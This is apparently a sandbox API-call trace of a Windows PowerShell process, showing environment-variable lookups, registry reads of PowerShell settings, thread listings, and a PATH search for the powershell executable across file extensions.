	[0358.542] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x10d7c0 | out: lpMode=0x10d7c0) returned 1
	[0358.543] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.543] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.543] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.547] SetEvent (hEvent=0x1cc) returned 1
	[0358.548] SetEvent (hEvent=0x36c) returned 1
	[0358.548] SetEvent (hEvent=0x390) returned 1
	[0358.548] SetEvent (hEvent=0x394) returned 1
	[0358.548] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0358.550] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.550] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.550] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d518 | out: phkResult=0x10d518*=0x33c) returned 0x0
	[0358.550] RegQueryValueExW (in: hKey=0x33c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d49c, lpData=0x0, lpcbData=0x10d498*=0x0 | out: lpType=0x10d49c*=0x0, lpData=0x0, lpcbData=0x10d498*=0x0) returned 0x2

Thread:
	id = 135
	os_tid = 0xb64


Thread:
	id = 148
	os_tid = 0xb24


Thread:
	id = 177
	os_tid = 0xba8


Thread:
	id = 247
	os_tid = 0xd20


Thread:
	id = 254
	os_tid = 0xd4c

	[0307.583] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0348.944] LocalFree (hMem=0x317290) returned 0x0
	[0348.945] RegCloseKey (hKey=0x328) returned 0x0
	[0348.945] LocalFree (hMem=0x3172c0) returned 0x0
	[0348.945] CloseHandle (hObject=0x318) returned 1
	[0348.945] CloseHandle (hObject=0x13) returned 1
	[0348.946] CloseHandle (hObject=0xf) returned 1
	[0348.946] RegCloseKey (hKey=0x304) returned 0x0
	[0348.946] RegCloseKey (hKey=0x300) returned 0x0
	[0348.947] RegCloseKey (hKey=0x2fc) returned 0x0
	[0353.511] RegCloseKey (hKey=0x1cc) returned 0x0
	[0356.766] RegCloseKey (hKey=0x388) returned 0x0
	[0356.767] RegCloseKey (hKey=0x384) returned 0x0
	[0356.767] RegCloseKey (hKey=0x380) returned 0x0
	[0356.767] RegCloseKey (hKey=0x37c) returned 0x0
	[0356.767] RegCloseKey (hKey=0x378) returned 0x0
	[0356.767] RegCloseKey (hKey=0x374) returned 0x0
	[0356.768] RegCloseKey (hKey=0x370) returned 0x0
	[0356.768] RegCloseKey (hKey=0x348) returned 0x0
	[0356.768] RegCloseKey (hKey=0x3a4) returned 0x0
	[0356.768] RegCloseKey (hKey=0x3a0) returned 0x0
	[0356.768] RegCloseKey (hKey=0x368) returned 0x0
	[0356.769] RegCloseKey (hKey=0x364) returned 0x0
	[0356.769] RegCloseKey (hKey=0x360) returned 0x0
	[0356.769] RegCloseKey (hKey=0x35c) returned 0x0
	[0356.769] RegCloseKey (hKey=0x358) returned 0x0
	[0356.770] RegCloseKey (hKey=0x354) returned 0x0
	[0356.770] RegCloseKey (hKey=0x350) returned 0x0
	[0356.770] RegCloseKey (hKey=0x34c) returned 0x0
	[0356.770] RegCloseKey (hKey=0x39c) returned 0x0
	[0356.771] RegCloseKey (hKey=0x33c) returned 0x0
	[0356.771] RegCloseKey (hKey=0x338) returned 0x0
	[0356.771] RegCloseKey (hKey=0x334) returned 0x0
	[0356.771] RegCloseKey (hKey=0x330) returned 0x0
	[0356.772] RegCloseKey (hKey=0x328) returned 0x0
	[0356.772] RegCloseKey (hKey=0x318) returned 0x0
	[0356.772] RegCloseKey (hKey=0x304) returned 0x0
	[0356.772] RegCloseKey (hKey=0x300) returned 0x0
	[0356.772] RegCloseKey (hKey=0x398) returned 0x0
	[0356.773] RegCloseKey (hKey=0x32c) returned 0x0
	[0356.773] RegCloseKey (hKey=0x1cc) returned 0x0
	[0356.773] RegCloseKey (hKey=0x394) returned 0x0
	[0356.773] RegCloseKey (hKey=0x390) returned 0x0
	[0356.773] RegCloseKey (hKey=0x36c) returned 0x0
	[0356.774] RegCloseKey (hKey=0x3a8) returned 0x0
	[0641.491] RegCloseKey (hKey=0x33c) returned 0x0

Thread:
	id = 267
	os_tid = 0xda8


Thread:
	id = 382
	os_tid = 0xa34

	[0358.585] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0358.589] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0358.594] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.594] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.594] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.596] VirtualQuery (in: lpAddress=0x1c80da60, lpBuffer=0x1c80e920, dwLength=0x30 | out: lpBuffer=0x1c80e920*(BaseAddress=0x1c80d000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.599] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.599] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.601] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.601] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.601] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.604] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.604] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.604] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.620] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.621] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.623] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.623] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.624] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.624] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.624] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.629] VirtualQuery (in: lpAddress=0x1c80dd10, lpBuffer=0x1c80ebd0, dwLength=0x30 | out: lpBuffer=0x1c80ebd0*(BaseAddress=0x1c80d000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0358.630] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.630] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.630] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.680] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.680] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.680] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.681] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.681] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.681] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.682] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.682] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.686] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.686] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.813] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.813] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.813] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.815] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.816] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.817] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.817] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.817] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.831] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.831] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.833] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.833] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.834] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.834] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.836] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.836] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.836] CoTaskMemFree (pv=0x1b7a8e30) 
	[0358.972] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0358.972] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.972] CoTaskMemFree (pv=0x1b7a8e30) 
	[0359.210] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0359.210] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0359.210] CoTaskMemFree (pv=0x1b7a8e30) 
	[0359.213] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8e30
	[0359.213] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b7a8e30, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0359.213] CoTaskMemFree (pv=0x1b7a8e30) 
	[0359.213] CoTaskMemAlloc (cb=0x128) returned 0x354bc0
	[0359.214] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x354bc0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0359.214] CoTaskMemFree (pv=0x354bc0) 
	[0359.218] CoTaskMemAlloc (cb=0x20e) returned 0x1b7a65e0
	[0359.218] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b7a65e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0359.218] CoTaskMemFree (pv=0x1b7a65e0) 
	[0359.222] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0359.223] SetErrorMode (uMode=0x1) returned 0x1
	[0359.226] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.236] SetErrorMode (uMode=0x1) returned 0x1
	[0359.237] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0359.237] SetErrorMode (uMode=0x1) returned 0x1
	[0359.238] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.271] SetErrorMode (uMode=0x1) returned 0x1
	[0359.272] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0359.272] SetErrorMode (uMode=0x1) returned 0x1
	[0359.272] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.280] SetErrorMode (uMode=0x1) returned 0x1
	[0359.281] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0359.282] SetErrorMode (uMode=0x1) returned 0x1
	[0359.282] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.289] SetErrorMode (uMode=0x1) returned 0x1
	[0359.291] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0359.291] SetErrorMode (uMode=0x1) returned 0x1
	[0359.291] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.299] SetErrorMode (uMode=0x1) returned 0x1
	[0359.300] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0359.300] SetErrorMode (uMode=0x1) returned 0x1
	[0359.300] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.324] SetErrorMode (uMode=0x1) returned 0x1
	[0359.325] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0359.326] SetErrorMode (uMode=0x1) returned 0x1
	[0359.326] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.334] SetErrorMode (uMode=0x1) returned 0x1
	[0359.335] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0359.335] SetErrorMode (uMode=0x1) returned 0x1
	[0359.335] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.343] SetErrorMode (uMode=0x1) returned 0x1
	[0359.344] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0359.344] SetErrorMode (uMode=0x1) returned 0x1
	[0359.344] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.364] SetErrorMode (uMode=0x1) returned 0x1
	[0359.365] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0359.366] SetErrorMode (uMode=0x1) returned 0x1
	[0359.366] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.374] SetErrorMode (uMode=0x1) returned 0x1
	[0359.375] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0359.375] SetErrorMode (uMode=0x1) returned 0x1
	[0359.376] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.384] SetErrorMode (uMode=0x1) returned 0x1
	[0359.385] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0359.385] SetErrorMode (uMode=0x1) returned 0x1
	[0359.385] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.393] SetErrorMode (uMode=0x1) returned 0x1
	[0359.394] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0359.394] SetErrorMode (uMode=0x1) returned 0x1
	[0359.395] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.426] SetErrorMode (uMode=0x1) returned 0x1
	[0359.427] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0359.427] SetErrorMode (uMode=0x1) returned 0x1
	[0359.428] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.436] SetErrorMode (uMode=0x1) returned 0x1
	[0359.437] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0359.437] SetErrorMode (uMode=0x1) returned 0x1
